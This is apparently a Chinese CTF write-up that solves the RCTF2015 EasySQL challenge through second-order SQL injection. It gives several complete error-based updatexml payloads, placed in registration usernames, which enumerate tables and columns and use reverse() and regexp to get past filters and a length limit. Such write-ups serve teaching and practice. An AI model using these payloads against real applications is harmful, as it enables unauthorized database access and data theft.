[RCTF2015]EasySQL ---不会编程的崽

今天也是sql注入的新类型---二次注入。不得不说花样真的多哦。

既然真的是sql注入了。那就不测试其他地方了。现在注册进去看一下界面

 

单纯的回显了名字。源代码里发现user.php。

 

可以修改密码？二次注入应该就在用户名这里了。因为修改密码时，用户名会被带入sql执行，这时就可以绕过waf。测试了一下这里修改密码不会有回显提示，所以不能常规注入，盲注也不行。最后这里只能考虑报错注入。

然后查看闭合，注册用户名为单引号，修改密码时没报错，而双引号却报错了。这说明后端闭合是使用双引号。因为双引号造成了闭合错误。同时过滤了空格，使用括号绕过即可。

最后fuzz一下看看过滤了哪些吧。过滤如下：

 没有伤到主体函数。直接开始注入

1.获取数据库

用户名:1"or(updatexml(1,concat(0x7e,database(),0x7e),1))#

然后登录去修改密码

ok哦，没毛病 。继续注入表名。

用户名:1"or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='web_sqli'),0x7e),1))#

 

这里我就不卖关子了。ctf今典骗术，flag表。真的flag在users表里

用户名:1"or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),0x7e),1))#

 

很明显这里还限制回显长度。real_flag_1s_here才对。但是它又过滤了right，left，mid等函数。

还有一个函数reverse，倒过来输出。

用户名:1"or(updatexml(3,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),0x7e),3))#

reverse:把结果倒着输出

where(real_flag_1s_here)regexp('^f'):在这个列名的结果里匹配f开头的字符串

还是没打印完全。正向在匹配一次。把reverse删除即可

用户名:1"or(updatexml(3,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e),3))#

 

把flag整合一下就好了。